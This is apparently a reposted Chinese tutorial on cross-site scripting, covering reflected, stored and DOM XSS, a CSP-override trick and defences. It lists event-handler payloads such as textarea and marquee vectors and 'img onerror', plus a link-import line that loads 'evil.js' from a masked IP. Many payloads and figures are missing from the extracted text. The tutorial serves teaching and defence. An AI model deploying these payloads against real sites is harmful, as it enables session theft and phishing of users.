从0到1完全掌握 XSS-攻略分享-游戏活动大全网

博客地址：https://drun1baby.github.io/

从0到1完全掌握 XSS文章篇幅较长，建议分块观看学习。

0x01 前言本人二刷 XSS，在一刷的时候是以漏洞挖掘与漏洞利用为主，实际上完全对于实战根本没有概念，出去工作一段时间之后才算是拿出来应用。写这篇文章是打算再好好地梳理一遍 XSS。

XSS 的本质是一种高级钓鱼手法。

0x02 什么是 XSSXSS (Cross Site Scripting) 攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆，故将跨站脚本攻击缩写为 XSS。XSS 是一种经常出现在 Web 应用中的计算机安全漏洞，它允许恶意 Web 用户将代码植入到提供给其它用户使用的页面中。

XSS 的运行原理是将恶意的 script 脚本插入进 html/css/js 文件当中。代码长这样。

0x03 XSS 的危害前文我们说 XSS 本质上来说是一种钓鱼攻击，所以 XSS 的危害角度上也是以钓鱼能够造成的危害为主。

0x04 XSS 简单应用场景举例这里我想先介绍 XSS 的应用方法，如此一来讲起来不会太空洞，也能与下面的攻击手段有所呼应。以反射型 XSS 为例，原理图如下。

这里借用国光师傅的图片进行分析

这是一个恶意的 QQ 空间钓鱼网站，我们在输入框内输入username%20，再对登陆的按钮设置一个 href 到真正的 QQ 空间官网。然而当时用户输入的用户名密码已经被攻击者窃取了。

0x05 XSS 基本攻击手段XSS 根据效果不同主要分为三种类型

反射型 XSS，存储型 XSS，DOM 型 XSS

危害性来说，存储型 XSS >> 反射型 XSS ~= DOM 型 XSS我们接下来细讲一下这三种 XSS 的攻击手段。

1. 反射型 XSS 及绕过手段(1) 什么是反射型 XSS反射型 XSS，也叫非持久型 XSS，转瞬即逝。

利用比较简单，比如在搜索框中，我记得当时 2020 年，b 站的搜索框还是存在 XSS 的，现在没有了。

反射型 XSS 的 Payload 如下

&token=;script-src-elem 'unsafe-inline'

我们使用script-src-elem对 CSP 进行覆盖，从而进行 XSS 攻击。

2. 存储型 XSS存储型 XSS 是危害性最大的 XSS 了，它一般出现于评论留言功能处，大致的利用方法与绕过手段与反射型 XSS 很像，原理图如下。

如果执行起来也是插入进上下文标签当中，和之前反射型 XSS 的代码图类似，都是没有加任何的过滤手段，如图。

我们在新增的评论中将 username 构造成 Payload

username=

而这一条评论，又会被保存到数组或者是数据库当中(这个看 Web 程序的设计)，就造成了存储型 XSS。

绕过手段不再逼逼，和反射型 XSS 是异曲同工。

3. DOM 型 XSS(重点!)DOM 型的 XSS 是基于文档对象模型 Document Objeet Model，DOM)的一种漏洞。说白了就是那些标签，比如img，input等这种类型的 DOM 节点标签而已，而 DOM 型 XSS 打的就是这些。

我个人觉得 DOM 型 XSS 与反射型，存储型 XSS 的区别可谓不是一点半点，虽然有人把 DOM 型 XSS 归结到反射型 XSS 当中，但是我们看下去，会感受到些许不同。

DOM 型 XSS 全部都是由前端进行触发的。所以我们平常如果挖洞，还是很考验代码审计的耐心的。

我们下面讲几种常见的攻击方式，在这之前，我们先把可以利用的 DOM 节点，以及其 Payload 拉出来。Payload 摘自HACK 师傅的文章

一些常用的标签与属性下面我列举的标签大部分是可以自动触发 js 代码的，无需用户去交互，大部分情况下我们也是希望是自动触发而不是等用户去触发。

scirpt 标签

img 标签标签定义 HTML 页面中的图像。

input 标签标签规定了用户可以在其中输入数据的输入字段。onfocus 事件在对象获得焦点时发生：

竞争焦点，从而触发 onblur 事件：

input 标签的 autofocus 属性规定当页面加载时元素应该自动获得焦点。可以通过 autofocus 属性自动执行本身的 focus 事件，这个向量是使焦点自动跳到输入元素上，触发焦点事件，无需用户去触发：

details 标签

标签通过提供用户开启关闭的交互式控件，规定了用户可见的或者隐藏的需求的补充细节。ontoggle 事件规定了在用户打开或关闭

元素时触发：

使用details 标签的 open 属性触发ontoggle事件，无需用户去点击即可触发：

svg 标签

select 标签

通过autofocus属性规定当页面加载时元素应该自动获得焦点，这个向量是使焦点自动跳到输入元素上，触发焦点事件，无需用户去触发：

textarea 标签标签定义一个多行的文本输入控件。</p> <p><textarea onfocus=alert(1); autofocus></p> <p>keygen 标签<keygen autofocus onfocus=alert(1)> //仅限火狐</p> <p>marquee 标签<marquee onstart=alert(1)></marquee> //Chrome不行，火狐和IE都可以</p> <p>isindex 标签<link>标签定义文档与外部资源的关系。在无 CSP 的情况下才可以使用：</p> <p><link rel=import href="http://47.xxx.xxx.72/evil.js"></p> <p>4. DOM 型 XSS 的利用和前文说的一样，各种 js 中捣鼓</p> <p>(1) jQuery 中的 DOM 型 XSS有问题的代码如下图所示</p> <p>若为进行任意过滤的时候 Payload</p> <p><img src=1 onerror=alert(1)></p> <p>(2) 利用遗留下的测试代码不多扯了，详见 WebGoat代码审计-07-XSS 利用测试代码触发 DOM 型 XSS)</p> <p>0x06 XSS 的实战应用几种钓鱼，和 getshellXSS 实战攻击思路总结从xss到getshell--xss的深层次利用与探讨</p> <p>0x07 CSRF 和 XSS 的区别1、CSRF是跨站请求伪造; XSS是跨域脚本攻击。2、CSRF需要用户先登录网站A,获取cookie; XSS不需要登录。3、CSRF是利用网站A本身的漏洞,去请求网站A的api; XSS是向网站A注入JS代码,然后执行JS里的代码,篡改网站A的内容。（XSS利用的是站点内的信任用户，而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义向第三方网站发送恶意请求。）</p> <p>0x08 XSS 的防御主要是两层：一：对输出端的数据进行编码二: 验证输入</p> <p>目前时间 2022 年 5 月，感觉 XSS 不像之前那么泛滥了。</p> <p>1. 对输出端的数据进行编码1）将一些字符进行转义，例如<，>进行转义2）白名单，通过一些标签限制3）不要把后端传进来的数据直接作为 HTML 渲染，进行处理</p> <p>2. CSP 的应用严格的 CSP 在 XSS 的防范中可以起到以下的作用：</p> <p>禁止加载外域代码，防止复杂的攻击逻辑。</p> <p>禁止内联脚本执行。</p> <p>禁止外域提交，网站被攻击后，用户的数据不会泄露到外域。</p> <p>合理使用上报可以及时发现 XSS，利于尽快修复问题。</p> <p>3. 其他安全措施HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。</p> <p>验证码：防止脚本冒充用户提交危险操作。</p> <div style="text-align: left;background:#f1f1f1;padding:20px;line-height:50px;"> <a href="/e56eb9a51f0676a6/cee6cc2620cb2826.html">苹果电脑与手机隔空投送操作指南（附常见问题及解决、AirDrop优势劣势</a><br><a href="/e56eb9a51f0676a6/ba719d74a5f0a4be.html">陌殇的意思</a> </div> </div> </div> </div>  <div class="rightGrid"> <aside class="flexWrapper right "> <div class="flexaside">  <div class="widgetWrapper mb15"> <div class="titleWrapper"> <h3 class="title"><b>最近热门</b></h3> </div> <ul class="articleBox mb15"> <li> <a href="/e1df4db0308ec4f8/b199f782a20db9ff.html" title="天天塔防战2025年夏日狂欢庆典：挑战极限塔防，赢取豪华游戏大礼包！" target="_blank"> <h4>天天塔防战2025年夏日狂欢庆典：挑战极限塔防，赢取豪华游戏大礼包！</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e1df4db0308ec4f8/7ee993fa1c33d298.html" title="菲利普·拉姆" target="_blank"> <h4>菲利普·拉姆</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e1df4db0308ec4f8/ea9349df1599333b.html" title="饿了么骑手怎么接单" target="_blank"> <h4>饿了么骑手怎么接单</h4> <p> · 07-25</p> </a> </li> <li> <a href="/41529490cc451078/5c547f1d61235739.html" title="九梦仙域：寻仙问道，踏歌而来" target="_blank"> <h4>九梦仙域：寻仙问道，踏歌而来</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e56eb9a51f0676a6/e328699e2e0bf828.html" title="车主无忧怎么样车主无忧加油卡靠谱吗" target="_blank"> <h4>车主无忧怎么样车主无忧加油卡靠谱吗</h4> <p> · 07-25</p> </a> </li> <li> <a href="/41529490cc451078/a4faddf2bdc2a6a8.html" title="《代号古兰物语：时空裂隙·黯影之约》全服跨服挑战暨限定剧情解锁活动" target="_blank"> <h4>《代号古兰物语：时空裂隙·黯影之约》全服跨服挑战暨限定剧情解锁活动</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e56eb9a51f0676a6/a8d89f1e7807ee92.html" title="仙王请留步——2025年5月28日上线狂欢盛典" target="_blank"> <h4>仙王请留步——2025年5月28日上线狂欢盛典</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e1df4db0308ec4f8/4225a2ccd5579d3c.html" title="《危机时刻》全球挑战赛：2025年4月3日开启的生存与策略终极对决" target="_blank"> <h4>《危机时刻》全球挑战赛：2025年4月3日开启的生存与策略终极对决</h4> <p> · 07-25</p> </a> </li> <li> <a href="/e1df4db0308ec4f8/5aca2e320d29fb61.html" title="Bibi 作品大全" target="_blank"> <h4>Bibi 作品大全</h4> <p> · 07-25</p> </a> </li> <li> <a href="/41529490cc451078/b1ea3458e82241fb.html" title="征途手游召唤玩哪系好" target="_blank"> <h4>征途手游召唤玩哪系好</h4> <p> · 07-25</p> </a> </li> </ul> </div>  </div> </aside>  </div> </article> </main> <div class="footerGrid"> <div class="midWrapper"> <div class="article"> <div class="ilink"> 友情链接： <script> var _mtj = _mtj || []; (function () { var mtj = document.createElement("script"); mtj.src = "https://node91.aizhantj.com:21233/tjjs/?k=gdvpk3plqch"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(mtj, s); })(); </script> </div> <p>Copyright © 2022 游戏活动大全网 - 全网活动一网打尽 All Rights Reserved. </p> </div> </div> </div> <script src="/static/js/common_tpl.js"></script> <script src="/static/js/zoom.js"></script> <script> var scrollTop = function(){ var offset = 300, offset_opacity = 1200, scroll_top_duration = 700, $back_to_top = $('.backTop'); $(window).scroll(function(){ ( $(this).scrollTop() > offset ) ? $back_to_top.addClass('backTopVisible') : $back_to_top.removeClass('backTopVisible cd-fade-out'); if( $(this).scrollTop() > offset_opacity ) { $back_to_top.addClass('cd-fade-out'); } }); $back_to_top.on('click', function(event){ event.preventDefault(); $('body,html').animate({ scrollTop: 0 , }, scroll_top_duration ); }); }; $(function(){ scrollTop(); $('#layoutMenu').click(function(){ $('#layoutNavGrid .navGrid, .layoutGroup').toggleClass('layout'); $('body').toggleClass('layoutLocked'); }); $('#closeMenuBtn').click(function(){ $('#layoutNavGrid .navGrid, .layoutGroup').removeClass('layout'); $('body').removeClass('layoutLocked'); }); window.onresize = function(){ documentChange(); }; }); // 监听浏览器 var documentChange = function(){ var docWidth = document.body.clientWidth; if(docWidth > 768){ $('#layoutNavGrid .navGrid, .layoutGroup').removeClass('layout'); $('body').removeClass('layoutLocked'); $('#articleNavGrid').addClass('whiteNav'); }else{ $('#articleNavGrid').removeClass('whiteNav'); } }; $(".dropdown").hover(function(e){ $(this).stop(true).toggleClass('wapdrop'); $(this).find('.select').stop(true).toggleClass('open'); e.stopPropagation(); }); $(document).on('click',function(){ var $target = $(event.target); if (!$target.is('.dropdown')) { // 排除按钮本身 // 执行你想要的操作 console.log('Click event triggered, but not by the button!'); }else{ $(".dropdown").removeClass("wapdrop"); $(".dropdown .open").removeClass("open"); } // $(".dropdown").removeClass("wapdrop"); // $(".dropdown .select").removeClass("open"); }) </script> </body> </html>